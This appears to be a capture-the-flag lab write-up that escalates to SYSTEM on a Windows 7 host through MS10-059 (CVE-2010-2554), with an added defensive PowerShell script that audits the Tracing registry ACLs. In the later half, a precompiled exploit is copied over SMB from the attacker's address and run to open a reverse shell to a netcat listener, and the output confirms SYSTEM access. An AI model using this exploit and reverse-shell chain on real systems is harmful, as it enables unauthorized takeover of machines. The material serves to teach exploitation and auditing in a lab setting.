CVE-2010-2554 (MS10-059)
The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 has incorrect ACLs on its registry keys, which allows local users to gain privileges via vectors involving a named pipe and impersonation, aka “Tracing Registry Key ACL Vulnerability.”
This vulnerability is also tracked as MS10-059, as shown in the Microsoft bulletin below.
Microsoft's bulletin also lists the affected systems, including the version running on the target.
According to Rapid7, an attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability.
A precompiled exploit binary was found online.
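Since the root cause is an over-permissive ACL on the Tracing registry keys, the following PowerShell script (an added example, not part of the original write-up or of the exploit) walks the Tracing key tree and reports every subkey where a principal other than the usual privileged accounts holds write rights. The key path HKLM\SOFTWARE\Microsoft\Tracing and the trusted-principal list are assumptions, not taken from the page.

```powershell
# Added audit script (not from the original write-up): flags Tracing registry
# subkeys on which a non-privileged principal holds write rights.
# Assumption: HKLM:\SOFTWARE\Microsoft\Tracing is the key tree the advisory refers to.
$root = 'HKLM:\SOFTWARE\Microsoft\Tracing'

# Principals that are expected to hold write access; any other Allow ACE
# granting a write right is reported. Adjust for your environment.
$trusted = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller',
    'CREATOR OWNER'
)

# Rights that let a caller change values, add subkeys or alter the DACL.
$writeMask = [System.Security.AccessControl.RegistryRights]::SetValue -bor
             [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
             [System.Security.AccessControl.RegistryRights]::WriteKey -bor
             [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
             [System.Security.AccessControl.RegistryRights]::TakeOwnership

function Get-WeakTracingAcl {
    param([string]$Path = $root)
    if (-not (Test-Path $Path)) { return @() }

    # Root key plus every subkey beneath it.
    $keys = @(Get-Item $Path) + @(Get-ChildItem $Path -Recurse -ErrorAction SilentlyContinue)

    foreach ($key in $keys) {
        $acl = Get-Acl -Path $key.PSPath
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if (($ace.RegistryRights -band $writeMask) -eq 0) { continue }
            if ($trusted -contains $ace.IdentityReference.Value) { continue }
            [pscustomobject]@{
                Key       = $key.Name
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

Get-WeakTracingAcl | Format-Table -AutoSize
```

Run from an elevated PowerShell prompt; no output means no untrusted principal has write rights under the Tracing key tree.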
c:\tmp>copy \\10.10.14.6\smb\MS10-059.exe
copy \\10.10.14.6\smb\MS10-059.exe
1 file(s) copied.
c:\tmp>.\MS10-059.exe
.\MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
c:\tmp>.\MS10-059.exe 10.10.14.6 1234
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
The exploit binary was transferred to the target machine over SMB and executed with the listener's address and port as its arguments.
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.5] 49167
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\tmp> whoami
whoami
nt authority\system
c:\tmp> hostname
hostname
devel
c:\tmp> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 3:
Connection-specific DNS Suffix  . :
IPv6 Address. . . . . . . . . . . : dead:beef::58c0:f1cf:abc6:bb9e
Temporary IPv6 Address. . . . . . : dead:beef::c66:ff0d:1e4:87d3
Link-local IPv6 Address . . . . . : fe80::58c0:f1cf:abc6:bb9e%15
IPv4 Address. . . . . . . . . . . : 10.10.10.5
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
                                    10.10.10.2
Tunnel adapter isatap.{c57f02f8-df4f-40ee-bc21-a206b3f501e4}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix  . :
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix  . :
The reverse shell connected back to the listener as NT AUTHORITY\SYSTEM.